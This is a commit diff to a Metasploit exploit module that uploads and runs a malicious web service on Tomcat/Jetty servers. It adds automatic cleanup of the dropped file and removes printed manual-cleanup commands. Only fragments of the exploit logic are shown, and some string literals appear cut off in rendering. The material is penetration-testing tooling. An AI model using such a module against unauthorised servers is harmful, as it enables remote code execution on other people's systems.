@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
1111 HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
1212
1313 include Msf ::Exploit ::Remote ::HttpClient
14+ include Msf ::Exploit ::FileDropper
1415
1516 def initialize ( info = { } )
1617 super ( update_info ( info ,
@@ -74,6 +75,11 @@ def initialize(info = {})
7475 def upload_exec ( session , rpath )
7576 contents = ''
7677 name = Rex ::Text . rand_text_alpha ( 8 )
78+
79+ # We must register this file early, that way the on_new_session method
80+ # won't miss it if FileDropper's cleanup routine kicks in.
81+ register_file_for_cleanup ( "webapps#{ rpath } #{ name } )
82+
7783 services_xml = %Q{
7884<service name="#{ name }
7985 <description>
@@ -215,7 +221,6 @@ def upload_exec(session,rpath)
215221 end
216222
217223 if res and res . code > 200 and res . code < 300
218- cleanup_instructions ( rpath , name ) # display cleanup info
219224 throw :stop # exit loop
220225 elsif res and res . code == 401
221226 if ( res . headers [ 'WWW-Authenticate' ] )
@@ -225,7 +230,6 @@ def upload_exec(session,rpath)
225230 if authmsg
226231 print_error ( "WWW-Authenticate: %s" % authmsg )
227232 end
228- cleanup_instructions ( rpath , name ) # display cleanup info
229233 raise ::Rex ::ConnectionError
230234 throw :stop # exit loop
231235 end
@@ -236,19 +240,6 @@ def upload_exec(session,rpath)
236240 end
237241 end
238242
239- def cleanup_instructions ( rpath , name )
240- print_line ( "" )
241- print_status ( "NOTE: You will need to delete the web service that was uploaded." )
242- print_line ( "" )
243- print_status ( "Using meterpreter:" )
244- print_status ( "rm \" webapps#{ rpath } #{ name } \" " )
245- print_line ( "" )
246- print_status ( "Using the shell:" )
247- print_status ( "cd \" webapps#{ rpath } \" " )
248- print_status ( "del #{ name } )
249- print_line ( "" )
250- end
251-
252243 def exploit
253244 user = datastore [ 'USERNAME' ]
254245 pass = datastore [ 'PASSWORD' ]
0 commit comments